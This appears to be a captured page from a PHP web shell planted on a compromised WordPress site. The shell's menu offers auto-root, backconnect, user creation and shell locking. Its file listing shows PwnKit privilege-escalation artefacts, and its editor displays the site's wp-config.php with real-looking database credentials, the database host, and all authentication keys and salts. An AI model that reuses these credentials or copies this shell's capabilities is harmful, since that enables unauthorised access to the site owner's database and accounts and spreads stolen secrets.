Linux web0273.sh.tyo1 4.18.0-553.141.2.lve.el7h.x86_64 #1 SMP Wed Jul 8 17:20:31 UTC 2026 x86_64
Apache
: 127.0.0.1 | : 216.73.217.179
Cant Read [ /etc/named.conf ]
8.3.31
r2745769
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
r2745769 /
public_html /
itami-bankin-syuuri.click /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
error
[ DIR ]
drwxr-xr-x
wp-admin
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
.htaccess
730
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
index.php
143.87
KB
-rw-r--r--
license.txt
19.44
KB
-rw-r--r--
pwnkit
10.99
KB
-rwxr-xr-x
readme.html
7.25
KB
-rw-r--r--
wp-activate.php
7.18
KB
-rw-r--r--
wp-blog-header.php
351
B
-rw-r--r--
wp-comments-post.php
2.27
KB
-rw-r--r--
wp-config-sample.php
3.26
KB
-rw-r--r--
wp-config.php
3.89
KB
-rw-------
wp-cron.php
5.49
KB
-rw-r--r--
wp-links-opml.php
2.43
KB
-rw-r--r--
wp-load.php
3.84
KB
-rw-r--r--
wp-login.php
50.25
KB
-rw-r--r--
wp-mail.php
8.52
KB
-rw-r--r--
wp-settings.php
30.33
KB
-rw-r--r--
wp-signup.php
33.84
KB
-rw-r--r--
wp-trackback.php
5.09
KB
-rw-r--r--
xmlrpc.php
3.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : wp-config.php
<?php /** * The base configuration for WordPress * * The wp-config.php creation script uses this file during the installation. * You don't have to use the web site, you can copy this file to "wp-config.php" * and fill in the values. * * This file contains the following configurations: * * * Database settings * * Secret keys * * Database table prefix * * Localized language * * ABSPATH * * @link https://wordpress.org/support/article/editing-wp-config-php/ * * @package WordPress */ // ** Database settings - You can get this info from your web host ** // /** The name of the database for WordPress */ define( 'DB_NAME', 'b17oe_an5t8ya5' ); /** Database username */ define( 'DB_USER', 'b17oe_65545e77' ); /** Database password */ define( 'DB_PASSWORD', 'A4xQd.kA4V]' ); /** Database hostname */ define( 'DB_HOST', 'mysql80.onamae.ne.jp' ); /** Database charset to use in creating database tables. */ define( 'DB_CHARSET', 'utf8' ); /** The database collate type. Don't change this if in doubt. */ define( 'DB_COLLATE', '' ); /**#@+ * Authentication unique keys and salts. * * Change these to different unique phrases! You can generate these using * the {@link https://api.wordpress.org/secret-key/1.1/salt/ WordPress.org secret-key service}. * * You can change these at any point in time to invalidate all existing cookies. * This will force all users to have to log in again. * * @since 2.6.0 */ define( 'AUTH_KEY', '_cta9f|s$+>M=R|wqu?mRh+[az`^$=Guu>PM^J,Vg{ wOPALXQI]rCx~ #,nJc=p' ); define( 'SECURE_AUTH_KEY', '.27J NxxVAY4,D,t<ek5r+N_/S~U]~jYSlexU8XFlIQ+d7H1(TOq0jI615OGWOLe' ); define( 'LOGGED_IN_KEY', 'B<Uv7~aZT40*0Eq3=jP9kO=UHpK9S([h57WX?np/3>a7T[3r*M3,y_hb@]c*oGW#' ); define( 'NONCE_KEY', '.3TD} K]OT#k LV q85-o/e{eK|TDcj:![U^DuIibw@UY#/vk]L>H&p<U8c4TMr5' ); define( 'AUTH_SALT', 'Q9Qo$o0q:_I7^Bb$0(d(fbC(|qC><)q219LluO?35fKs)}2{MW[<a1RAJi/3u)Ze' ); define( 'SECURE_AUTH_SALT', ',,|;zS6+tiLYHZ[uCwL;NU}Iq;3F{@&M|>XZs^*3?9nE;#u?fks$Ji{<8u#vYH!P' ); define( 'LOGGED_IN_SALT', 'SPc=%@V%#pIq$%(,%]g{sdC(}.=|7YR&M,Gdg{eRy`|ev#UOb=D)[bX}Nj~X[A?S' ); define( 'NONCE_SALT', ';plOG>)(*TTKPHI.=so01S.^P|%DfEvQQ1&z_bYO$w~o>u3zfz6zyBN1=!.`caiS' ); define( 'WP_CACHE_KEY_SALT', 'R/Bu `~PxCPu_*SWz%D;-TR4T*7jr]AWb7)mF(H,$L@KRk;|2fXO-*Qd/E?`s:?b' ); /**#@-*/ /** * WordPress database table prefix. * * You can have multiple installations in one database if you give each * a unique prefix. Only numbers, letters, and underscores please! */ $table_prefix = 'wp_'; if (isset($_SERVER['HTTP_X_FORWARDED_PROTO']) && $_SERVER['HTTP_X_FORWARDED_PROTO'] === "https") { $_SERVER['HTTPS'] = 'on'; define('FORCE_SSL_LOGIN', true); define('FORCE_SSL_ADMIN', true); } /** * For developers: WordPress debugging mode. * * Change this to true to enable the display of notices during development. * It is strongly recommended that plugin and theme developers use WP_DEBUG * in their development environments. * * For information on other constants that can be used for debugging, * visit the documentation. * * @link https://wordpress.org/support/article/debugging-in-wordpress/ */ define( 'WP_DEBUG', false ); /* Add any custom values between this line and the "stop editing" line. */ define( 'RS_DASHBOARD_PLUGIN_SID', 'E5BN4x8HrH9sdnYkCFrxTvgl0qWlvz5fypeLlejpi65BIkYtwzy0e3yvDRNoct-vmt1YZMBcAExRRca18d1kLppTWf2VY_eeKuyHox97nzw.' ); define( 'RS_DASHBOARD_PLUGIN_DID', 'I2wQC7v49CBmtpya96-HDC8okL_l9aWMO-iJxv0Xiiw92xc79x0UOuH07u0Rq5cdgA45errqyeGtH4XIk8lk4hgvglRlShS8-orcA44hroE.' ); //define('WP_DEBUG', true); //define('WP_DEBUG_LOG', true); //define('WP_DEBUG_DISPLAY', false); //error_log('DEBUG TEST: wp-config loaded'); /* That's all, stop editing! Happy publishing. */ /** Absolute path to the WordPress directory. */ if ( ! defined( 'ABSPATH' ) ) { define( 'ABSPATH', __DIR__ . '/' ); } /** Sets up WordPress vars and included files. */ require_once ABSPATH . 'wp-settings.php';
Close